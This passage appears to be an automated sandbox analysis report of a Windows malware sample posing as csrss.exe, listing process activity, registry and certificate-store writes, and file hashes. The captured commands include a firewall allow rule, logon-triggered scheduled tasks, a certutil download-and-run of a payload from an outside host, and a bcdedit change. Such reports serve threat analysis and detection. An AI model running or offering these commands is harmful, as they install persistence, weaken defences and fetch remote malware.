47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510csrss.exe
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510csrss.exe
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510csrss.exe
  • Suspicious behavior: EnumeratesProcesses
    6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.execsrss.exe

    Reported IOCs

    pidprocess
    11206be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    12926be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    1764csrss.exe
    1764csrss.exe
  • Suspicious use of AdjustPrivilegeToken
    6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.execsrss.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege11206be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Token: SeImpersonatePrivilege11206be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Token: SeSystemEnvironmentPrivilege1764csrss.exe
  • Suspicious use of WriteProcessMemory
    6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.execmd.execsrss.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 1292 wrote to memory of 169612926be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.execmd.exe
    PID 1292 wrote to memory of 169612926be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.execmd.exe
    PID 1292 wrote to memory of 169612926be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.execmd.exe
    PID 1292 wrote to memory of 169612926be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.execmd.exe
    PID 1696 wrote to memory of 8201696cmd.exenetsh.exe
    PID 1696 wrote to memory of 8201696cmd.exenetsh.exe
    PID 1696 wrote to memory of 8201696cmd.exenetsh.exe
    PID 1292 wrote to memory of 176412926be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.execsrss.exe
    PID 1292 wrote to memory of 176412926be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.execsrss.exe
    PID 1292 wrote to memory of 176412926be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.execsrss.exe
    PID 1292 wrote to memory of 176412926be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.execsrss.exe
    PID 1764 wrote to memory of 14121764csrss.exebcdedit.exe
    PID 1764 wrote to memory of 14121764csrss.exebcdedit.exe
    PID 1764 wrote to memory of 14121764csrss.exebcdedit.exe
    PID 1764 wrote to memory of 14121764csrss.exebcdedit.exe
Processes 10
  • C:\Users\Admin\AppData\Local\Temp\6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    "C:\Users\Admin\AppData\Local\Temp\6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe"
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of AdjustPrivilegeToken
    PID:1120
    • C:\Users\Admin\AppData\Local\Temp\6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
      "C:\Users\Admin\AppData\Local\Temp\6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe"
      Loads dropped DLL
      Windows security modification
      Adds Run key to start application
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1292
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        Suspicious use of WriteProcessMemory
        PID:1696
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          Modifies data under HKEY_USERS
          PID:820
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        Executes dropped EXE
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        PID:1764
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          Creates scheduled task(s)
          PID:1032
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://10gamestop.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          Creates scheduled task(s)
          PID:1216
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          Executes dropped EXE
          Loads dropped DLL
          PID:580
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          Modifies boot configuration data using bcdedit
          PID:1412
  • C:\Windows\system32\makecab.exe
    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220521002659.log C:\Windows\Logs\CBS\CbsPersist_20220521002659.cab
    Drops file in Windows directory
    PID:1184
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Discovery
        Execution
          Exfiltration
            Impact
              Initial Access
                Lateral Movement
                  Privilege Escalation
                    Replay Monitor
                    00:00 00:00
                    Downloads
                    • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

                      MD5

                      13aaafe14eb60d6a718230e82c671d57

                      SHA1

                      e039dd924d12f264521b8e689426fb7ca95a0a7b

                      SHA256

                      f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

                      SHA512

                      ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

                    • C:\Windows\rss\csrss.exe

                      MD5

                      c40e14338592240c54c328318963b3bb

                      SHA1

                      0026ef8f4f8baaeda070e1f306e2a7618a8b2e6d

                      SHA256

                      6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a

                      SHA512

                      292bb0075078174a848ee6a7ce74654bcfbdb1ba590461c9cc3203ae9d0286a5965c34ff6b317d05372e517238c504aeb0dc1ae9523ca6a311ec27c6583aab95

                    • \Users\Admin\AppData\Local\Temp\csrss\patch.exe

                      MD5

                      13aaafe14eb60d6a718230e82c671d57

                      SHA1

                      e039dd924d12f264521b8e689426fb7ca95a0a7b

                      SHA256

                      f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

                      SHA512

                      ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

                    • \Users\Admin\AppData\Local\Temp\csrss\patch.exe

                      MD5

                      13aaafe14eb60d6a718230e82c671d57

                      SHA1

                      e039dd924d12f264521b8e689426fb7ca95a0a7b

                      SHA256

                      f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

                      SHA512

                      ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

                    • \Users\Admin\AppData\Local\Temp\csrss\patch.exe

                      MD5

                      13aaafe14eb60d6a718230e82c671d57

                      SHA1

                      e039dd924d12f264521b8e689426fb7ca95a0a7b

                      SHA256

                      f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

                      SHA512

                      ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

                    • \Users\Admin\AppData\Local\Temp\dbghelp.dll

                      MD5

                      f0616fa8bc54ece07e3107057f74e4db

                      SHA1

                      b33995c4f9a004b7d806c4bb36040ee844781fca

                      SHA256

                      6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

                      SHA512

                      15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

                    • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

                      MD5

                      1afff8d5352aecef2ecd47ffa02d7f7d

                      SHA1

                      8b115b84efdb3a1b87f750d35822b2609e665bef

                      SHA256

                      c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

                      SHA512

                      e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

                    • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

                      MD5

                      1afff8d5352aecef2ecd47ffa02d7f7d

                      SHA1

                      8b115b84efdb3a1b87f750d35822b2609e665bef

                      SHA256

                      c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

                      SHA512

                      e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

                    • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

                      MD5

                      1afff8d5352aecef2ecd47ffa02d7f7d

                      SHA1

                      8b115b84efdb3a1b87f750d35822b2609e665bef

                      SHA256

                      c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

                      SHA512

                      e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

                    • \Users\Admin\AppData\Local\Temp\osloader.exe

                      MD5

                      e2f68dc7fbd6e0bf031ca3809a739346

                      SHA1

                      9c35494898e65c8a62887f28e04c0359ab6f63f5

                      SHA256

                      b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

                      SHA512

                      26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

                    • \Users\Admin\AppData\Local\Temp\osloader.exe

                      MD5

                      e2f68dc7fbd6e0bf031ca3809a739346

                      SHA1

                      9c35494898e65c8a62887f28e04c0359ab6f63f5

                      SHA256

                      b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

                      SHA512

                      26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

                    • \Users\Admin\AppData\Local\Temp\osloader.exe

                      MD5

                      e2f68dc7fbd6e0bf031ca3809a739346

                      SHA1

                      9c35494898e65c8a62887f28e04c0359ab6f63f5

                      SHA256

                      b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

                      SHA512

                      26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

                    • \Users\Admin\AppData\Local\Temp\symsrv.dll

                      MD5

                      5c399d34d8dc01741269ff1f1aca7554

                      SHA1

                      e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

                      SHA256

                      e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

                      SHA512

                      8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

                    • \Windows\rss\csrss.exe

                      MD5

                      c40e14338592240c54c328318963b3bb

                      SHA1

                      0026ef8f4f8baaeda070e1f306e2a7618a8b2e6d

                      SHA256

                      6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a

                      SHA512

                      292bb0075078174a848ee6a7ce74654bcfbdb1ba590461c9cc3203ae9d0286a5965c34ff6b317d05372e517238c504aeb0dc1ae9523ca6a311ec27c6583aab95

                    • \Windows\rss\csrss.exe

                      MD5

                      c40e14338592240c54c328318963b3bb

                      SHA1

                      0026ef8f4f8baaeda070e1f306e2a7618a8b2e6d

                      SHA256

                      6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a

                      SHA512

                      292bb0075078174a848ee6a7ce74654bcfbdb1ba590461c9cc3203ae9d0286a5965c34ff6b317d05372e517238c504aeb0dc1ae9523ca6a311ec27c6583aab95

                    • memory/820-61-0x000007FEFBAA1000-0x000007FEFBAA3000-memory.dmp

                    • memory/820-60-0x0000000000000000-mapping.dmp

                    • memory/1120-54-0x0000000002430000-0x00000000027D6000-memory.dmp

                    • memory/1120-57-0x0000000000400000-0x0000000000B10000-memory.dmp

                    • memory/1120-56-0x00000000027E0000-0x0000000002ED6000-memory.dmp

                    • memory/1120-55-0x0000000002430000-0x00000000027D6000-memory.dmp

                    • memory/1292-58-0x0000000002620000-0x00000000029C6000-memory.dmp

                    • memory/1292-62-0x0000000002620000-0x00000000029C6000-memory.dmp

                    • memory/1292-63-0x0000000000400000-0x0000000000B10000-memory.dmp

                    • memory/1412-84-0x0000000000000000-mapping.dmp

                    • memory/1696-59-0x0000000000000000-mapping.dmp

                    • memory/1764-70-0x0000000000400000-0x0000000000B10000-memory.dmp

                    • memory/1764-68-0x0000000002660000-0x0000000002A06000-memory.dmp

                    • memory/1764-66-0x0000000000000000-mapping.dmp

                    • memory/1764-69-0x0000000002660000-0x0000000002A06000-memory.dmp